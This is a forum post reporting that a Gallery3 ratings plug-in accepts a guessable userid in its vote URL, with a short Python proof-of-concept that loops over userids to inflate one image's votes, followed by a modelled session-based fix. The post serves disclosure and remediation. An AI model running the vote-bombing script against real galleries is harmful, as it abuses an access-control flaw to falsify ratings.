module Ratings: accessible via URL for unauth. users


Peter von Niederhäusern

Oct 31, 2024, 1:12:09 PM
to gallery...@googlegroups.com
Hi,

How can URLs be secured so that they can only be called if the user has a valid Gallery session?

A plug-in used to vote for images uses an easily guessable sequence ID for each user, and thus, a user can vote for an image an unlimited number of times (bomb voting) using the script below.

Normally, the voting happens via the gallery3 web interface for logged-in users, and blocks multiple votes by the same user for the same image.

We use the Ratings module/plug-in: "Provides options for a sidebar block and under photo block for a ratings system. Inspired from and utilizing Michelle Steigerwalt's Rabid Ratings (http://www.msteigerwalt.com/widgets/ratings/v1.5/) | By J.E. Nash"

The following Python script exploits the bug:

    #!/usr/bin/env python3
    import requests

    # Each iteration guesses the next sequential userid. The endpoint trusts the
    # userid in the URL rather than the session, so the same image (id 595)
    # receives one more vote for every guessed user.
    for i in range(415, 420):
        url = (
            "https://gallery-host/modules/ratings/vendor/ratings.php"
            "?modpath=/var/www/gallery3/modules/&varpath=/var/www/gallery3/var/"
            f"&votestring=vote&imageword=star&userid={i}"
        )
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = {"vote": 100, "id": 595}

        resp = requests.post(url=url, headers=headers, data=data)
        print(f"userid {i} => " + resp.text)
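For comparison, here is a model of how the vote endpoint should decide who is voting. This is an added example and not code from Gallery3 or Rabid Ratings: the user identity is taken from the server-side session, the `userid` URL parameter is ignored, and each (user, image) pair may be scored once, so replaying the loop above with guessed userids yields no extra votes. The session cookie, user id 42 and the `VoteStore` container are constructed for the example.

```python
from dataclasses import dataclass, field


@dataclass
class VoteStore:
    # session cookie -> user id, as the server's session store would hold it
    sessions: dict
    # (user_id, image_id) -> score; one entry per user per image
    votes: dict = field(default_factory=dict)


def handle_vote(store, session_cookie, query, form):
    """Return (http_status, message) for one POST to the vote endpoint.

    `query` holds the URL parameters, including the client-chosen userid,
    which is deliberately never read; `form` holds the POSTed vote and id."""
    user_id = store.sessions.get(session_cookie)
    if user_id is None:
        return 401, "valid session required"           # not logged in
    try:
        image_id = int(form["id"])
        score = int(form["vote"])
    except (KeyError, ValueError):
        return 400, "malformed vote"
    if not 0 <= score <= 100:
        return 400, "vote out of range"
    key = (user_id, image_id)                          # identity from the session
    if key in store.votes:
        return 409, "already voted for this image"     # blocks repeat votes
    store.votes[key] = score
    return 200, f"vote recorded for image {image_id}"


def vote_count(store, image_id):
    """Number of distinct users who have voted for image_id."""
    return sum(1 for (_, img) in store.votes if img == image_id)


def replay_bomb(store, session_cookie):
    """Replay the loop from the post against the model: five requests, each
    with a different guessed userid, all for image 595 with vote=100."""
    statuses = []
    for guessed_userid in range(415, 420):
        query = {"votestring": "vote", "imageword": "star", "userid": guessed_userid}
        status, _ = handle_vote(store, session_cookie, query, {"vote": 100, "id": 595})
        statuses.append(status)
    return statuses
```

Without a session every request is refused; with one valid session the five requests record a single vote, whatever userid the URL carries.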




